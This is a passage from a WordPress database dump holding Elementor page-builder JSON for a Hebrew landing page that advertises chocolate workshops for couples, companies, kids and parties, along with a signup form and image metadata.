\\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05de\\u05ea!\\\"\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":28},\"typography_font_weight\":\"400\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"17\",\"bottom\":\"0\",\"left\":\"17\",\"isLinked\":false},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"25\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"25\"},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"typography_font_style\":\"italic\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5c25e365\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u05d2\\u05dd \\u05d0\\u05e0\\u05d9 \\u05e8\\u05d5\\u05e6\\u05d4 \\u05dc\\u05d4\\u05d9\\u05e8\\u05e9\\u05dd \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4!\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26},\"typography_font_weight\":\"bold\",\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"3\"},\"button_text_color\":\"#40272c\",\"background_color\":\"#edd0a8\",\"border_width\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\",\"isLinked\":false},\"border_color\":\"#edd0a8\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"50\",\"bottom\":\"20\",\"left\":\"50\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"15\"},\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#5c0011\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false}]'),(98,34,'_elementor_version','0.4'),(100,35,'_wp_attached_file','2018/05/HDR.jpg'),(101,35,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1621;s:6:\"height\";i:848;s:4:\"file\";s:15:\"2018/05/HDR.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"HDR-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"HDR-300x157.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:157;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:15:\"HDR-768x402.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:402;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:16:\"HDR-1024x536.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:536;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:32:\"twentyseventeen-thumbnail-avatar\";a:4:{s:4:\"file\";s:15:\"HDR-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(102,36,'_wp_page_template','elementor_canvas'),(103,36,'_elementor_edit_mode','builder'),(104,36,'_elementor_template_type','post'),(105,36,'_elementor_data','[{\"id\":\"7e94e72f\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"height\":\"min-height\",\"custom_height\":{\"unit\":\"vh\",\"size\":\"60\"},\"column_position\":\"stretch\",\"background_background\":\"classic\",\"background_image\":{\"id\":35,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/HDR.jpg\"},\"background_position\":\"center center\",\"background_size\":\"cover\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"25\",\"bottom\":\"40\",\"left\":\"25\",\"isLinked\":false}},\"elements\":[{\"id\":\"3b866986\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"rgba(255,255,255,0.73)\",\"margin\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"63\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"53\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c8a61fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":33,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/logoup.png\"},\"space\":{\"unit\":\"%\",\"size\":18},\"_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"_background_background\":\"classic\",\"_background_color\":\"#f1d5ad\",\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"1f909fe7\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d8\\u05e2\\u05d5\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d0\\u05d9\\u05db\\u05d5\\u05ea\\u05d9 \\u05d1\\u05d9\\u05d5\\u05dd \\u05d0\\u05d7\\u05d3 \\u05d8\\u05e2\\u05d9\\u05dd \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#40272c\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"45\"},\"typography_font_weight\":\"100\",\"typography_line_height\":{\"unit\":\"em\",\"size\":\"0.9\"},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"38\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"35\"},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"35481412\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d4\\u05d9\\u05e8\\u05e9\\u05dd \\u05dc\\u05e1\\u05d3\\u05e0\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4\",\"align\":\"center\",\"title_color\":\"#40272c\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"22\"},\"typography_font_weight\":\"bold\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"20\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"18\"}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"41e0dd23\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"_id\":\"eovd5tr\",\"required\":\"true\",\"field_options\":\"\",\"inline_list\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"field_html\":\"\",\"custom_id\":\"eovd5tr\"},{\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"_id\":\"68frv7y\",\"field_options\":\"\",\"inline_list\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"field_html\":\"\",\"custom_id\":\"68frv7y\"},{\"field_type\":\"tel\",\"field_label\":\"\\u05d8\\u05dc\'\",\"placeholder\":\"\\u05d8\\u05dc\'\",\"width\":\"100\",\"_id\":\"p0rl9g7\",\"required\":\"\",\"field_options\":\"\",\"inline_list\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"field_html\":\"\",\"custom_id\":\"p0rl9g7\"}],\"show_labels\":\"\",\"button_text\":\"\\u05d2\\u05dd \\u05d0\\u05e0\\u05d9 \\u05e8\\u05d5\\u05e6\\u05d4 \\u05dc\\u05d4\\u05d9\\u05e8\\u05e9\\u05dd \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4!\",\"success_message\":\"The message was sent successfully!\",\"error_message\":\"There\'s something wrong... Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong... The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":\"10\"},\"row_gap\":{\"unit\":\"px\",\"size\":\"15\"},\"field_text_color\":\"#54595f\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_typography_typography\":\"custom\",\"button_typography_font_weight\":\"bold\",\"button_typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"3\"},\"button_background_color\":\"#5c0011\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":false},\"field_typography_typography\":\"custom\",\"field_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"13\"},\"button_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"14\"},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"22\",\"bottom\":\"22\",\"left\":\"22\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"button_background_hover_color\":\"#40272c\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4f74ca63\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#e3e0dd\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"20\",\"bottom\":\"70\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[{\"id\":\"655473aa\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"55.702\",\"margin\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"12\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"13679594\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d0\\u05db\\u05d5\\u05dc \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e2\\u05dd \\u05d7\\u05d1\\u05e8\\u05d9\\u05dd\",\"align\":\"right\",\"title_color\":\"#40272c\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"35\"},\"typography_font_family\":\"Damion\",\"typography_font_weight\":\"100\",\"typography_text_transform\":\"capitalize\",\"typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"align_mobile\":\"center\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"31\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"30\"}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"66f30f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05db\\u05d5\\u05dc\\u05e0\\u05d5 \\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05d0\\u05ea \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7 \\u05e9\\u05d0\\u05d7\\u05e8\\u05d9, \\u05d7\\u05dc\\u05e7\\u05e0\\u05d5 \\u05d0\\u05e4\\u05d9\\u05dc\\u05d5 \\u05d0\\u05d5\\u05db\\u05dc\\u05d9\\u05dd \\u05e4\\u05d7\\u05d5\\u05ea \\u05d1\\u05d0\\u05e8\\u05d5\\u05d7\\u05ea \\u05d4\\u05e2\\u05e8\\u05d1 \\u05e8\\u05e7 \\u05db\\u05d3\\u05d9 \\u05e9\\u05e0\\u05d5\\u05db\\u05dc \\u05dc\\u05e0\\u05e6\\u05dc \\u05d0\\u05ea \\u05ea\\u05e4\\u05e8\\u05d9\\u05d8 \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e2\\u05d3 \\u05ea\\u05d5\\u05de\\u05d5, \\u05d0\\u05d6 \\u05dc\\u05de\\u05d4 \\u05e9\\u05dc\\u05d0 \\u05e0\\u05e2\\u05e9\\u05d4 \\u05d9\\u05d5\\u05dd \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd?<\\/p><p>\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e0\\u05d5\\u05e6\\u05e8\\u05d5 \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3 \\u05dc\\u05e8\\u05d2\\u05e2\\u05d9\\u05dd \\u05d4\\u05d0\\u05dc\\u05d4, \\u05e9\\u05e0\\u05d5\\u05db\\u05dc \\u05dc\\u05d4\\u05d2\\u05d9\\u05e2 \\\"\\u05db\\u05de\\u05e2\\u05d8 \\u05e9\\u05d1\\u05e2\\u05d9\\u05dd\\\" \\u05d5\\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05de\\u05d2\\u05d5\\u05d5\\u05df \\u05de\\u05d0\\u05db\\u05dc\\u05d9\\u05dd \\u05d8\\u05e2\\u05d9\\u05de\\u05d9\\u05dd \\u05e9\\u05e1\\u05d5\\u05d1\\u05d1\\u05d9\\u05dd \\u05e1\\u05d1\\u05d9\\u05d1 \\u05d4\\u05d0\\u05d5\\u05db\\u05dc \\u05d4\\u05de\\u05ea\\u05d5\\u05e7 \\u05d4\\u05d0\\u05d4\\u05d5\\u05d1 \\u05e2\\u05dc \\u05db\\u05d5\\u05dc\\u05e0\\u05d5, \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3. \\u05d4\\u05d7\\u05dc \\u05de\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05e8\\u05d9\\u05e8 \\u05d5\\u05e2\\u05d3 \\u05dc\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e0\\u05d5\\u05d6\\u05dc, \\u05d4\\u05db\\u05dc \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d9\\u05d5\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9 \\u05dc\\u05de\\u05d3\\u05d9 \\u05d1\\u05db\\u05dc \\u05e6\\u05d5\\u05e8\\u05d4 \\u05d5\\u05e6\\u05d1\\u05e2, \\u05db\\u05dc \\u05d3\\u05e8\\u05da \\u05d5\\u05e9\\u05e2\\u05d4.\\u00a0<\\/p>\",\"text_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19},\"typography_line_height\":{\"unit\":\"em\",\"size\":\"1.6\"},\"align_mobile\":\"center\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"14\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"17\"}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"15f91cbb\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"44.298\",\"margin\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_position\":\"center\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"385ae28\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/inner-hp.jpg\",\"id\":26}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4477cb\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"25\",\"bottom\":\"50\",\"left\":\"25\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"20\",\"bottom\":\"60\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[{\"id\":\"702ee38f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"60600fc4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":32,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-couple.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"f9b0ce7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"6945b5b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":31,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-woman.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"fa7a00f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"afa7d0f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":28,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-company.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"4a4b992\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"c498248\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":30,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-kids.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5684ff50\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"id\":24,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/michael-browning-188999.png\"},\"background_size\":\"cover\"